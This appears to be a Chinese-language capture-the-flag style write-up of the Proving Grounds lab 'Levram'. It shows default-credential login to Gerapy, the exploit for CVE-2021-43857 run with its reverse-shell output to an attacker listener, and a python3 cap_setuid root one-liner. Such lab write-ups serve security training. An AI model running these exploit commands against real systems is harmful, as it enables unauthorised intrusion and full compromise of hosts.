临渊羡鱼

退而结网

0%

Proving Grounds Practice - Levram

Posted on In , ,
Proving Grounds Practice Lab中Levram打靶过程记录

Difficulty

easy

scans

autorecon扫描

1
2
3
4
5
6
7
8
[*] ssh found on tcp/22.
    OpenSSH 8.9p1


[*] http-alt found on tcp/8000.
    WSGIServer/0.2 CPython/3.10.6
    SilverStream
    Title: Gerapy

foothold

8000 gerapy

弱密码admin:admin登录

底部发现版本号

seachspolit

searchsploit gerapy

完全符合,执行后报错,查看利用代码,获取projects时返回数据为空, 新建一个test project,重新执行,成功反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
python 50640.py -t 192.168.212.24 -p 8000 -L 192.168.45.184 -P 80
  ______     _______     ____   ___ ____  _       _  _  _____  ___ ____ _____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |     | || ||___ / ( _ ) ___|___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \  / /
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__   _|__) | (_) |__) |/ /
 \____|  \_/  |_____|   |_____|\___/_____|_|        |_||____/ \___/____//_/


Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
Traceback (most recent call last):
  File "/home/kali/Tools/pg/Levarm/50640.py", line 130, in <module>
    exp.exploitation()
  File "/home/kali/Tools/pg/Levarm/50640.py", line 76, in exploitation
    name = dict3[0]['name']
           ~~~~~^^^
IndexError: list index out of range

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
python 50640.py -t 192.168.212.24 -p 8000 -L 192.168.45.184 -P 80
  ______     _______     ____   ___ ____  _       _  _  _____  ___ ____ _____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |     | || ||___ / ( _ ) ___|___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \  / /
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__   _|__) | (_) |__) |/ /
 \____|  \_/  |_____|   |_____|\___/_____|_|        |_||____/ \___/____//_/


Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: test
[*] Getting the ID of the project to build the URL
[*] Found ID of the project:  1
[*] Setting up a netcat listener
listening on [any] 80 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)
connect to [192.168.45.184] from (UNKNOWN) [192.168.212.24] 44652
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$ id
id
uid=1000(app) gid=1000(app) groups=1000(app)

escalation

下载linpeas, 发现python3 cap_setuid 权限, 执行 python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'提权

https://gtfobins.github.io/gtfobins/python/

1
2
3
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(app) groups=1000(app)